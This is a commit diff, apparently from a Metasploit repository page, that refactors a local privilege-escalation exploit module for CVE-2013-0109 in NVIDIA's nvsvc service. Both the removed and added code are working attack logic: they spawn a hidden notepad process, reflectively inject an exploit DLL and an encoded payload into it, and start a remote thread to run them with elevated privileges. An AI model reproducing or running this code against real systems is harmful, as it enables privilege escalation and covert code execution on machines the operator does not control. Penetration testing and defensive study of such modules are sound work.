Re-add RDI mixin changes
parent
e22b4ba88c
commit
41c538856a
|
@ -120,12 +120,6 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_proc
|
|
||||||
windir = expand_path("%windir%")
|
|
||||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
|
||||||
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
|
||||||
end
|
|
||||||
|
|
||||||
def is_running?
|
def is_running?
|
||||||
begin
|
begin
|
||||||
status = service_status('nvsvc')
|
status = service_status('nvsvc')
|
||||||
|
@ -134,60 +128,39 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
print_error("Unable to retrieve service status")
|
print_error("Unable to retrieve service status")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
unless is_running?
|
if is_system?
|
||||||
print_error("Service not running - attempting to start")
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||||
res = service_start('nvsvc')
|
|
||||||
case res
|
|
||||||
when 0
|
|
||||||
print_good("Service started")
|
|
||||||
when 1
|
|
||||||
print_status("Service already started")
|
|
||||||
else
|
|
||||||
fail_with(Exploit::Failure::Unknown, "Unable to start service")
|
|
||||||
end
|
|
||||||
else
|
|
||||||
print_good("Service is running")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
dll = ''
|
unless check == Exploit::CheckCode::Vulnerable
|
||||||
offset = nil
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||||
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
|
||||||
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
|
||||||
|
|
||||||
pay = payload.encoded
|
|
||||||
|
|
||||||
bo = dll.index('PAYLOAD:')
|
|
||||||
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
|
||||||
dll[bo, pay.length] = [pay].pack("a*")
|
|
||||||
|
|
||||||
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
|
||||||
|
|
||||||
pe.exports.entries.each do |entry|
|
|
||||||
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
|
||||||
offset = pe.rva_to_file_offset( entry.rva )
|
|
||||||
break
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_error("No offset found") unless offset
|
print_status("Launching notepad to host the exploit...")
|
||||||
|
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
||||||
|
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||||
|
print_good("Process #{process.pid} launched.")
|
||||||
|
|
||||||
new_pid = create_proc
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||||
|
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||||
|
"CVE-2013-0109", "nvidia_nvsvc.x86.dll")
|
||||||
|
library_path = ::File.expand_path(library_path)
|
||||||
|
|
||||||
if not new_pid
|
print_status("Injecting exploit into #{process.pid} ...")
|
||||||
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
|
||||||
end
|
|
||||||
|
|
||||||
vprint_status("Injecting payload into memory")
|
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||||
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
payload_mem = inject_into_process(host_process, payload.encoded)
|
||||||
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
|
||||||
host_process.memory.protect(mem)
|
# invoke the exploit, passing in the address of the payload that
|
||||||
host_process.memory.write(mem, dll)
|
# we want invoked on successful exploitation.
|
||||||
print_status("Executing exploit...")
|
print_status("Payload injected. Executing exploit...")
|
||||||
host_process.thread.create(mem+offset)
|
host_process.thread.create(exploit_mem + offset, payload_mem)
|
||||||
|
|
||||||
|
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue